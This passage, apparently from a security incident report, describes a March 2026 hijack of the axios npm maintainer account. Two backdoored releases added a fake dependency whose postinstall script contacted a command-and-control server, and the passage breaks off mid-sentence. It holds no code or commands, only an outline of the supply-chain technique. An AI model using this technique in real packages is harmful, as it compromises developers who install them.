On March 31, 2026, an attacker hijacked the npm account of axios's primary maintainer (jasonsaayman) and published two backdoored versions of the package — [email protected] and [email protected] — within 39 minutes of each other, covering both the current 1.x and legacy 0.x release branches simultaneously.
axios is one of the most widely used JavaScript libraries in existence, with over 100 million weekly downloads. The attack was not opportunistic — it was precision. The malicious dependency was staged 18 hours in advance, three platform-specific payloads were pre-built, and every artifact was designed to self-destruct after execution.
The malicious versions didn't modify axios itself. Instead, they injected a fake dependency — [email protected] — whose sole purpose was to run a postinstall script the moment anyone ran npm install. That script silently contacted a command-and-contr